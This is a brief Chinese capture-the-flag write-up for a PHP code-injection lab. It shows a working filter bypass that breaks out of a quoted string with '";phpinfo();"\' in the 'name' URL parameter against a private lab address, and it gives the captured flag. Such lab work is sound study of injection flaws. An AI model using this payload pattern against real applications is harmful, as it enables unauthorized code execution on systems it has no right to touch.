编程语言
首页 > 编程语言> > Vuln-Range之php命令注入

Vuln-Range之php命令注入

作者:互联网

1.开启靶场

简介显示有phpcode注入漏洞,简单绕过之后就可以执行phpinfo(),拿到flag啦。

通过传入name参数的值就可以来进行代码注入了。

2.随便试一个值

http://192.168.0.20:32769/?name=phpinfo()

果然没有那么简单,被过滤了。

3.查看源码

 

我不太懂php的代码,查阅了一下,可以通过截断的方式来进行绕过

";phpinfo();"\ #通过;来把拼接的字符串截断就可以绕过了
http://192.168.0.20:32769/?name=%22;phpinfo();%22\

拿到flag

flag{39a23b19e7df2581be80091b484687bc} 

 

标签:32769,name,phpinfo,flag,192.168,Vuln,Range,绕过,php
来源: https://blog.csdn.net/lionwerson/article/details/115311802